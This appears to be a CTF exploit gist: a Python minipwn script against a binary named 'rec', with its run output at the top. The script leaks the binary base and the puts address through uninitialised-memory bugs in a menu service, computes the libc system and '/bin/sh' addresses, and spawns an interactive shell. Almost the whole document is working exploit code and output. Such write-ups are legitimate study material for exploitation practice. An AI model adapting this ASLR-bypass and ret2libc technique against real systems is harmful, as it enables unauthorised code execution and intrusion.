@inaz2
Created January 2, 2017 09:04
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
from minipwn import *
def read_note(s):
    """Pick menu entry 1 and return the line printed after 'Your note: '.

    `s` is the connection handle used by the minipwn helpers. The returned
    line is passed back exactly as recvline() delivers it.
    """
    recvuntil(s, '> ')
    sendline(s, '1')
    # Skip the label so the next line read is the note content itself.
    recvuntil(s, 'Your note: ')
    return recvline(s)
def polish_sum(s, operands):
    """Run the menu's sum operation over `operands` and return the result.

    Picks menu entry 2 with operator 'S', sends each operand as decimal text
    at its own 'Operand: ' prompt, ends the list with '.', and returns the
    'Sum: ' line converted with int().
    """
    def answer(prompt, reply):
        # Wait for the prompt before replying, so input stays in step.
        recvuntil(s, prompt)
        sendline(s, reply)

    answer('> ', '2')
    answer('Operator: ', 'S')
    for item in operands:
        recvuntil(s, 'Operand: ')
        sendline(s, str(item))
    # A lone '.' at the operand prompt ends the operand list.
    answer('Operand: ', '.')
    recvuntil(s, 'Sum: ')
    return int(recvline(s))
def sign(s, value):
    """Pick menu entry 5 and submit `value` as decimal text.

    Only the menu prompt is awaited; the value is sent straight after the
    menu choice and no reply is read here.
    """
    recvuntil(s, '> ')
    for text in ('5', str(value)):
        sendline(s, text)
# Start the target binary as a local process; `s` is the handle every
# minipwn helper below reads from and writes to.
s = connect_process(['./rec_7743d76881fe811335ca25d8b0a3c5f54a21e2f1'])
#raw_input()
# The note is read without one having been written first in this script.
# NOTE(review): bytes 4..8 of the reply are treated as a pointer into the
# binary image, so the note output presumably discloses uninitialised memory
# and with it the randomised load address. 0x6fb would then be that pointer's
# offset in this exact build -- confirm against the binary.
note = read_note(s)
bin_base = u32(note[4:8]) - 0x6fb
print "[+] bin_base = %x" % bin_base
# Build-specific offsets from the image base. The names suggest the PLT stub
# and the GOT slot of puts -- TODO confirm against the binary.
plt_puts = bin_base + 0x520
got_puts = bin_base + 0x2fd8
# 0x63 filler operands (0..0x62) followed by the two computed addresses.
# NOTE(review): sign(s, 0) presumably reaches a path that uses stale values
# left behind by the sum operation (use of an uninitialised variable).
# Initialising that state in the service would remove the dependency --
# confirm against the binary.
values = range(0x63) + [plt_puts, got_puts]
polish_sum(s, values)
sign(s, 0)
# The string below is a no-op expression kept as a note. It records how the
# libc offsets used further down were read from the local 32-bit libc.
"""
$ nm -D /lib32/libc.so.6 | grep -e puts$ -e system$
0005f140 W puts
0003a940 W system
$ strings -tx /lib32/libc.so.6 | grep /bin/sh
158e8b /bin/sh
"""
# The first four bytes of the next output line are unpacked as the runtime
# address of puts in libc.
data = recvline(s)
libc_puts = u32(data[:4])
print "[+] libc_puts = %x" % libc_puts
# Subtracting the puts offset gives the libc base, and adding the other
# offsets gives system and the "/bin/sh" string. The three constants are
# valid only for the libc build listed in the note above.
libc_system = libc_puts - 0x0005f140 + 0x0003a940
libc_binsh = libc_puts - 0x0005f140 + 0x158e8b
print "[+] libc_system = %x" % libc_system
print "[+] libc_binsh = %x" % libc_binsh
def u2s(x):
    """Reinterpret a 32-bit unsigned integer as a signed one.

    The value is packed as little-endian unsigned and the same four bytes are
    unpacked as little-endian signed, so 0xffffffff becomes -1. struct.error
    is raised when `x` does not fit in an unsigned 32-bit integer.
    """
    raw = struct.pack('<I', x)
    (signed,) = struct.unpack('<i', raw)
    return signed
# Same operand layout as the first round, now ending in the two libc
# addresses. They are above 0x7fffffff (see the f7... values printed above),
# and operands are sent as decimal text, so u2s() converts them to signed
# form first -- presumably because the service parses signed 32-bit integers.
values = range(0x63) + [u2s(libc_system), u2s(libc_binsh)]
polish_sum(s, values)
sign(s, 0)
# Printed unconditionally: nothing here checks the outcome of the round.
print "[+] got a shell!"
# Hand the session over to the terminal (minipwn helper, not shown here).
interact(s)